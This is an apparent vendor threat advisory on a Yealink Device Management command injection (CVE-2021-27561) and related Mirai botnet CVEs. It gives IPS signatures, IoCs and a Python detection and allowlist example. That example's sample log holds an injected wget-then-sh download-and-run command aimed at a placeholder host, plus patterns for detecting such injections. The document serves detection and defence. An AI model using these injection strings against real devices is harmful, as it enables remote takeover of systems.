
Yealink Device Management Command Injection Vulnerability

The SonicWall Capture Labs threat research team has observed attacks exploiting a vulnerability in Yealink devices.

Yealink’s powerful GUI-driven Yealink Device Management Platform delivers a comprehensive set of tools for implementing up to 5,000 Microsoft-certified Yealink Skype for Business IP phones. The platform solves the complexities of provisioning, management, call quality control and troubleshooting. The solution allows system-wide oversight and the ability to drill down into specific needs for various regions, user groups or even a particular device model.

Yealink Device Management Command Injection Vulnerability | CVE-2021-27561
A command injection vulnerability exists in Yealink Device Management. It allows command injection as root via the URI, without authentication.

The Yealink DM server does not filter user-provided data, which allows remote, unauthenticated attackers to execute arbitrary commands.

In the observed exploit, the attacker bypasses authentication, then downloads and executes a malicious script from an attacker-controlled server.
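As an added illustration (not SonicWall's or Yealink's code), the following Python shows the two defender-side controls that the description above points at: an allowlist check that a management endpoint should apply to user-supplied values before they can reach any OS command, and a scan over web-server access-log lines that flags requests whose path or query carries shell metacharacters or a download-then-run chain, which is the kind of request an IPS signature like the one listed on this page is built to catch. The `/example/...` endpoint, the parameter name `host`, the IP addresses and the log lines are all constructed for this example; the real vulnerable URI is not given on this page.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Allowlist for a hostname/IP-style management parameter (hypothetical endpoint).
# Anything outside [A-Za-z0-9.-] is rejected before it could reach an OS command.
HOSTNAME_OK = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

# Shell metacharacters that end one command and start another.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")
# Download-then-run chain (wget/curl ... sh) typical of botnet loaders.
FETCH_EXEC = re.compile(r"\b(wget|curl)\b.*\b(sh|bash)\b", re.IGNORECASE | re.DOTALL)

# Apache/nginx "combined" access-log format; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def is_valid_param(value: str) -> bool:
    """True only if the value consists solely of allowlisted characters."""
    return HOSTNAME_OK.match(value) is not None


def validate_param(value: str) -> str:
    """Mitigation: accept only allowlisted values, otherwise refuse the request."""
    if not is_valid_param(value):
        raise ValueError(f"rejected parameter value {value!r}")
    return value


def suspicious_request(uri: str) -> bool:
    """Detection: True if the decoded path, any query key or any query value
    carries shell metacharacters or a fetch-and-execute chain."""
    parts = urlsplit(uri)
    candidates = [parts.path]
    for key, val in parse_qsl(parts.query, keep_blank_values=True):
        candidates.extend((key, val))
    # Decode twice so double-encoded input (%253b -> %3b -> ;) is caught as well.
    decoded = [unquote(unquote(c)) for c in candidates]
    return any(SHELL_META.search(c) or FETCH_EXEC.search(c) for c in decoded)


def scan_access_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (source IP, request URI) for every parsable line that looks like injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and suspicious_request(m.group("uri")):
            hits.append((m.group("src"), m.group("uri")))
    return hits


# Constructed sample log; the /example/... endpoint and all addresses are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Mar/2021:10:01:02 +0000] "GET /example/device/list?page=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [16/Mar/2021:10:01:09 +0000] "POST /example/ping HTTP/1.1" 200 88',
    '198.51.100.23 - - [16/Mar/2021:10:02:41 +0000] "GET /example/ping?host=192.0.2.1;wget%20http://198.51.100.23/x.sh%20-O%20/tmp/x;sh%20/tmp/x HTTP/1.1" 200 0',
    '198.51.100.23 - - [16/Mar/2021:10:02:42 +0000] "GET /example/ping?host=192.0.2.1%7C%7Cid HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for src, uri in scan_access_log(SAMPLE_LOG):
        print(f"suspicious request from {src}: {uri}")
    try:
        validate_param("192.0.2.1;id")
    except ValueError as err:
        print(err)
```

The allowlist is deliberately strict rather than a denylist of metacharacters: a denylist has to anticipate every encoding and shell trick, whereas an allowlist only has to describe what a legitimate hostname looks like. The log scan is a triage aid, not a replacement for the IPS signature; it will produce false positives on any endpoint where `;` or `|` legitimately appear in parameters, so tune `SHELL_META` per application.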

The following versions are vulnerable:

  • Yealink Device Management (DM) 3.6.0.20

SonicWall Capture Labs provides protection against this threat via the following signatures:

      • IPS:15456 Yealink DM Remote Code Execution

IoCs

  • 03f37a12673fd7ad01b744f84b61aad062a5b6eafbeb7aeac4a00ef28159ad80
  • 203.159.80.241

Threat Graph

Critical Vulnerabilities Of Network Security Devices Being Utilized By Mirai Botnet Malware

The SonicWall Capture Labs Threat Research team has received reports about a new Mirai botnet malware targeting network security devices. The Mirai botnet malware attack involves many different brands of connected network security devices that are affected by critical vulnerabilities. The following vulnerabilities are involved:

  • CVE-2020-25506: D-Link DNS-320 firewall exploit
  • CVE-2021-27561: Yealink Device Management remote code-execution (RCE)
  • CVE-2021-27562: Yealink Device Management remote code-execution (RCE)
  • CVE-2020-26919: Netgear ProSAFE Plus exploit
  • CVE-2021-22502: Micro Focus Operation Bridge Reporter RCE
  • CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution (RCE)
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

On March 16, 2021, the SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

  • CVE-2020-25506
    IPS:15455 D-Link DNS-320 system_mgr.cgi Command Injection
  • CVE-2021-27561/CVE-2021-27562
    IPS:15456 Yealink DM Remote Code Execution
  • CVE-2021-22502
    IPS:15457 Micro Focus Operations Bridge Reporter Command Injection
  • CVE-2019-19356
    IPS:15458 Netis WF2419 netcore_set.cgi Remote Code Execution
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
    This is an old vulnerability. SonicWall released the patch for this vulnerability in 2015. There are also existing signatures detecting it:
    IPS:5603 GNU Bash Code Injection (CVE-2014-6271) 2
    IPS:13064 GNU Bash Code Injection (CVE-2014-6278)
  • GAV signatures to cover malware samples:
    GAV: Mirai.LL
    GAV: Mirai.LL_1